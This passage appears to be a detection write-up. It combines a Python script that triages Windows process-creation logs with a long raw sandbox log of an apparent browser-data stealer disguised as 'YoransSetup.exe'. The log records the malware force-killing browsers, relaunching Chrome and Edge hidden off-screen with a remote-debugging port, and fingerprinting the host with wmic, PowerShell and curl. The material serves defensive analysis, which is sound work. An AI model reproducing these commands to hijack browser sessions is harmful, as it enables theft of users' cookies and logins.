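Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
"""

# Image path ends at the first ".exe "; everything after it is the command line.
ENTRY_RE = re.compile(
    r"^Source: (?P<parent>.+?) \| Process created: (?P<image>.+?\.exe) (?P<cmdline>.*)$",
    re.IGNORECASE,
)
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe", "firefox.exe"}
TASKKILL_RE = re.compile(r"taskkill\s+/IM\s+(\S+)\s+/F", re.IGNORECASE)
# Flags that make a debugging-enabled browser unobtrusive to the victim.
STEALTH_FLAGS = ("--no-sandbox", "--disable-gpu", "--window-position=-32000,-32000")
FINGERPRINT = {  # detection names are the author's labels, not Joe Sandbox's
    "bios_version": re.compile(r"wmic\s+bios\s+get\s+smbiosbiosversion", re.IGNORECASE),
    "memory_chip": re.compile(r"wmic\s+MemoryChip\s+get", re.IGNORECASE),
    "video_controller": re.compile(r"win32_VideoController", re.IGNORECASE),
    "os_product_name": re.compile(r"Get-ItemPropertyValue.*CurrentVersion.*-Name\s+ProductName", re.IGNORECASE),
    "external_ip": re.compile(r"curl\s+https?://api\.ipify\.org", re.IGNORECASE),
}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_log(text):
    """Return one dict per well-formed entry; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            entries.append(m.groupdict())
    return entries


def detect_remote_debugging(entries):
    """A browser launched with a DevTools port: the ABE-bypass pattern."""
    hits = []
    for e in entries:
        m = re.search(r"--remote-debugging-port=(\d+)", e["cmdline"])
        if m and basename(e["image"]) in BROWSERS:
            hits.append({
                "browser": basename(e["image"]),
                "port": int(m.group(1)),
                "parent": e["parent"],
                "real_profile": "--profile-directory=" in e["cmdline"],
                "suspicious_flags": [f for f in STEALTH_FLAGS if f in e["cmdline"]],
            })
    return hits


def detect_taskkill_burst(entries, threshold=3):
    """Parents that force-kill at least `threshold` distinct images.

    Only the `cmd /c "taskkill ..."` wrapper is counted, so the taskkill.exe
    child (whose parent is cmd.exe) does not double-count the same kill.
    """
    targets = defaultdict(set)
    for e in entries:
        m = TASKKILL_RE.search(e["cmdline"])
        if m and basename(e["image"]) == "cmd.exe":
            targets[e["parent"]].add(m.group(1).lower())
    return {p: sorted(t) for p, t in targets.items() if len(t) >= threshold}


def detect_fingerprinting(entries):
    """Map each fingerprinting technique seen to the first parent that used it."""
    seen = {}
    for e in entries:
        for name, rx in FINGERPRINT.items():
            if rx.search(e["cmdline"]):
                seen.setdefault(name, e["parent"])
    return seen


def triage(text):
    entries = parse_log(text)
    return {
        "remote_debugging": detect_remote_debugging(entries),
        "taskkill_bursts": detect_taskkill_burst(entries),
        "fingerprinting": detect_fingerprinting(entries),
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_LOG), indent=2))
```

The remote-debugging finding is the one to page on: a user-driven DevTools session is started from a shortcut or a terminal, not from an unsigned binary under `%LOCALAPPDATA%\Programs`, and never with the window moved off-screen. The taskkill sweep is what frees the profile's locked database files and makes the relaunch possible, so the two findings with the same parent should be correlated rather than scored separately.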
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Steam.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM Steam.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM javaw.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM javaw.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\Yoranis Setup.exe -> Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq YoransSetup.exe" /FO csv | "C:\Windows\system32\find.exe" "YoransSetup.exe"
Source: C:\Windows\SysWOW64\cmd.exe -> Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq YoransSetup.exe" /FO csv
Source: C:\Windows\SysWOW64\cmd.exe -> Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "YoransSetup.exe"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1664 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --mojo-platform-channel-handle=2404 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM kometa.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM uran.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\find.exe find /i "Speed"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq chrome.exe""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM yandex.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq msedge.exe""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq firefox.exe""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq chrome.exe""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Steam.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM javaw.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe -> Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\curl.exe curl http://api.ipify.org/ --ssl-no-revoke
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversion
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:list
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\find.exe find /i "Speed"
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq msedge.exe"
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq firefox.exe"
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq chrome.exe"
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Program Files\Google\Chrome\Application\chrome.exe -> Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq msedge.exe"
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq firefox.exe"
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq chrome.exe"
Source: C:\Windows\System32\cmd.exe -> Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe -> Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe -> Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe -> Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,3448241921201964185,6892278070021911797,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2412 /prefetch:3
